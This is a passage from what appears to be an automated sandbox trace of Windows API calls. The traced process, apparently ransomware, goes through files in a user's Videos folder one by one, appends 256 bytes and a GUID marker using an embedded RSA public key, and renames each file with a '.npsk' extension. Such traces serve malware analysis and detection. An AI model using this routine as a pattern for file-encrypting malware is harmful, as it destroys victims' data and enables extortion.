ftLastWriteTime.dwLowDateTime=0x20be2840, ftLastWriteTime.dwHighDateTime=0x1d5db74, nFileSizeHigh=0x0, nFileSizeLow=0xb150, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qxEZ6rADOXOFsdXLmpW.mp4", cAlternateFileName="QXEZ6R~1.MP4")) returned 1 [0216.181] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qxEZ6rADOXOFsdXLmpW.mp4") returned=".mp4" [0216.181] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qxEZ6rADOXOFsdXLmpW.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qxez6radoxofsdxlmpw.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.181] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=45392) returned 1 [0216.181] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.183] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xb12a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.183] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.184] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xb150, lpOverlapped=0x0) returned 1 [0216.185] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.185] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.185] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.185] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b2018) returned 1 [0216.186] CryptCreateHash (in: hProv=0x7b2018, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.186] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.186] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.186] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.186] GetLastError () returned 0x0 [0216.186] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.186] CryptReleaseContext (hProv=0x7b2018, dwFlags=0x0) returned 1 [0216.186] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.186] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.186] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.187] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.187] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xb150, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.187] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.187] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.187] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.187] CloseHandle (hObject=0x61c) returned 1 [0216.188] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qxEZ6rADOXOFsdXLmpW.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qxez6radoxofsdxlmpw.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qxEZ6rADOXOFsdXLmpW.mp4.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qxez6radoxofsdxlmpw.mp4.npsk")) returned 1 [0216.190] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc710f80, ftCreationTime.dwHighDateTime=0x1d5e4b4, ftLastAccessTime.dwLowDateTime=0x34ad4930, ftLastAccessTime.dwHighDateTime=0x1d5df7f, ftLastWriteTime.dwLowDateTime=0x34ad4930, ftLastWriteTime.dwHighDateTime=0x1d5df7f, nFileSizeHigh=0x0, nFileSizeLow=0x13cd9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uHOYNb.flv", cAlternateFileName="")) returned 1 [0216.190] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uHOYNb.flv") returned=".flv" [0216.190] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uHOYNb.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uhoynb.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.190] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=81113) returned 1 [0216.190] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.192] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x13cb3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.192] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.193] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x13cd9, lpOverlapped=0x0) returned 1 [0216.194] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.194] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.194] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.194] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.195] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.195] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.195] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.195] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.195] GetLastError () returned 0x0 [0216.195] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.195] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.195] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.195] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.195] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.196] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.196] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x13cd9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.196] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.197] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.197] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.197] CloseHandle (hObject=0x61c) returned 1 [0216.198] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uHOYNb.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uhoynb.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uHOYNb.flv.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uhoynb.flv.npsk")) returned 1 [0216.199] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48469520, ftCreationTime.dwHighDateTime=0x1d5e2de, ftLastAccessTime.dwLowDateTime=0x921230b0, ftLastAccessTime.dwHighDateTime=0x1d5dbef, ftLastWriteTime.dwLowDateTime=0x921230b0, ftLastWriteTime.dwHighDateTime=0x1d5dbef, nFileSizeHigh=0x0, nFileSizeLow=0xd5c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="W5G4ZP44yX0Afp.mkv", cAlternateFileName="W5G4ZP~1.MKV")) returned 1 [0216.199] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\W5G4ZP44yX0Afp.mkv") returned=".mkv" [0216.199] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\W5G4ZP44yX0Afp.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\w5g4zp44yx0afp.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.199] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=54728) returned 1 [0216.200] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.201] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xd5a2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.201] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.202] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xd5c8, lpOverlapped=0x0) returned 1 [0216.203] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.203] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.203] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.203] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.204] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.204] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.204] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.204] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.204] GetLastError () returned 0x0 [0216.204] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.204] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.204] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.204] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.204] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.205] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.205] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xd5c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.205] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.205] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.205] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.206] CloseHandle (hObject=0x61c) returned 1 [0216.207] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\W5G4ZP44yX0Afp.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\w5g4zp44yx0afp.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\W5G4ZP44yX0Afp.mkv.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\w5g4zp44yx0afp.mkv.npsk")) returned 1 [0216.208] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x362039a0, ftCreationTime.dwHighDateTime=0x1d5e32e, ftLastAccessTime.dwLowDateTime=0x7e85caf0, ftLastAccessTime.dwHighDateTime=0x1d5dd4f, ftLastWriteTime.dwLowDateTime=0x7e85caf0, ftLastWriteTime.dwHighDateTime=0x1d5dd4f, nFileSizeHigh=0x0, nFileSizeLow=0xc6c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WfbLFIv.flv", cAlternateFileName="")) returned 1 [0216.208] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WfbLFIv.flv") returned=".flv" [0216.208] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WfbLFIv.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wfblfiv.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.208] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=50886) returned 1 [0216.208] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.210] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xc6a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.210] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.212] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xc6c6, lpOverlapped=0x0) returned 1 [0216.212] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.212] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.212] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.212] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.213] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.213] CryptHashData 